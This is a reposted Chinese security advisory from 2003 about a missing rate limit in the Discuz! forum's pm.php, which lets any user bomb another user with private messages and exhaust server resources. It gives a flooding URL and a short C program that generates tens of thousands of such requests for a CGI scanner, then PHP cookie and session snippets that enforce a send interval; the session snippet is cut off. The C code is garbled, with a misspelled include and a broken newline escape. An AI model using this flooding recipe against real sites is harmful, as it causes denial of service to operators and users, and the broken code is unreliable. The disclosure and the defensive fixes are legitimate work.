本文整理自网络,侵删。
涉及版本:
目前(2003/9/21)所有免费版本(我没有商业版)
描述:
由于pm.php发送消息那部分代码,缺乏对时间间隔的限制。导致任何用户可以对任何用户发送消息炸弹。导致服务器空间、资源被消耗。严重可导致拒绝服务。
具体:
大家可以看到pm.php文件的86行的代码:
86 } elseif($action == ’send’) {
87
88 if(!$pmsubmit) {
……
179 showmessage(’pm_send_succeed’, ’pm.php’);
180 }
这部分代码没有检测用户发送短信的时间间隔限制代码。我们只要注册任意一个用户登陆后,提交:
http://127.0.0.1/discuz/pm.php?action=send...st&message=test
就可以轰炸angel这个用户了。提高效率的攻击方法:
#incluse
main()
{
int i;
for(i=0;i<55933;i++)
{
printf("nwww.xxx.com/discuz/pm.php?action=send&pmsubmit=submit&msgto=angel&subject=test&message=test",i);
}
}
编译运行file.exe >discuzpm.txt,然后把discuzpm.txt导入任何一款CGI扫描器。Run……
防范方法:
一,限制用户发信的间隔时间
可以利用PHP的SESSION或者COOKIE来限制用户每次发信的间隔。处理用户发送短信时,可以选择以下两种方式区别用户是否在规定的时间内连续发送短信,假设管理员设置两次发帖时间的间隔为2分钟,看看下面两个例子:
Cookie方式:
if ($beforepmid) die("对不起,你两次发信的时间间隔还不到2分钟"); // $beforepmid
前一次发信的ID
else setcookie("beforepmid",$pmid,time()+60*2,"/","",0); // $pmid
短信ID
Session方式:
session_start();
if (session_is_registered("time") && time()-$_SESSION[’time’]<60*2)
{
die("对不起,你两次发帖的时间间隔还不到2分钟"); // $time 前一次发信的时间
} else {
$time=time();
相关阅读 >>
详解织梦模板dedecms对Discuz论坛的一些常用调用代码
discuz! 5.0.0论坛程序中加入一段js代码,让会员点击下载附件前自动弹出提示窗口
更多相关阅读请进入《Discuz论坛》频道 >>
